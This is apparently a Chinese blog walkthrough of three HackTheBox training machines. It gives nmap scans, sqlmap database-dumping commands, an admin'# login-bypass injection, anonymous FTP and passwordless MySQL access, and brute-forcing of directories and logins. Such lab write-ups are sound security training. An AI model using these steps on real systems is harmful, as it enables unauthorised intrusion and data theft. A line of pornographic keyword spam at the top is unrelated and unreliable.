小男孩‘自慰网亚洲一区二区,亚洲一级在线播放毛片,亚洲中文字幕av每天更新,黄aⅴ永久免费无码,91成人午夜在线精品,色网站免费在线观看,亚洲欧洲wwwww在线观看

分享

玩轉(zhuǎn)HackTheBox靶場(二)

 zZ華 2023-03-30 發(fā)布于廣東

本文我們接著前期文章來學習hackthebox相關的靶場關卡。

TIER0我們在直播過程中已經(jīng)為大家進行了講解,本文單獨講解 TIER1的關卡吧。

Image

Appointment

這關考察的是sql注入相關方面的知識,我們首先對其進行端口掃描。

nmap -T4 -A 10.129.23.47 

Image如上,我們可以到了只起開了80端口,毫無疑問應該是個web站長。訪問IP如下。

Image既然是存在sql注入,我們在burp中進行抓包,將數(shù)據(jù)放到sqlmap中進行掃描即可。

Image將數(shù)據(jù)包保存為txt文件,然后執(zhí)行下面命令。

sqlmap -r '22.txt' --dbs

如下,成功得到數(shù)據(jù)庫信息。

Image表信息

sqlmap -r '22.txt' -D appdb --tables

Image表字段

sqlmap -r '22.txt' -D appdb -T users --columns
Image

當然,除了sqlmap跑之外還有更簡單的方法,我們利用萬能賬號直接登錄就行了。如admin'#

Image

Sequle

同樣,我們還是選對設備進行端口掃描。

nmap -sC -sV 10.129.95.232

我們可以看到,目標開啟了3306mysql端口。

Image對于既然目標來氣了mysql相關端口,我們可以嘗試暴力破解或者匿名登錄。執(zhí)行下面命令

mysql -h 10.129.95.232 -u root -p

回車后,發(fā)現(xiàn)可以直接登錄。

show databases; #顯示數(shù)據(jù)庫
use htb; #選擇數(shù)據(jù)庫
show tables; #顯示表
select * from config; #查詢表

如下,成功得到flag

Image

Crocodile

同樣,啟動靶場后我們對目標進行端口掃描。

nmap -sC -sV 10.129.104.219

Image如下,目標開啟了21 80端口。并且21端口可以匿名登錄。我們首先登錄ftp來看看。

Image下載文件

get allowed.userlist # 用戶列表
get allowed.userlist.passwd # 密碼列表

打開兩個文件,疑似存放了賬號和密碼。我們訪問80端口。

Image利用后臺掃描工具掃描站點后臺地址

dirb http://10.129.104.219 -w  /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -X .php

Image用下載后的賬號和密碼進行登錄,這里我用burp抓包后,進行枚舉破解。

Image成功得到flag

Image

    本站是提供個人知識管理的網(wǎng)絡存儲空間,所有內(nèi)容均由用戶發(fā)布,不代表本站觀點。請注意甄別內(nèi)容中的聯(lián)系方式、誘導購買等信息,謹防詐騙。如發(fā)現(xiàn)有害或侵權內(nèi)容,請點擊一鍵舉報。
    轉(zhuǎn)藏 分享 獻花(0

    0條評論

    發(fā)表

    請遵守用戶 評論公約

    類似文章 更多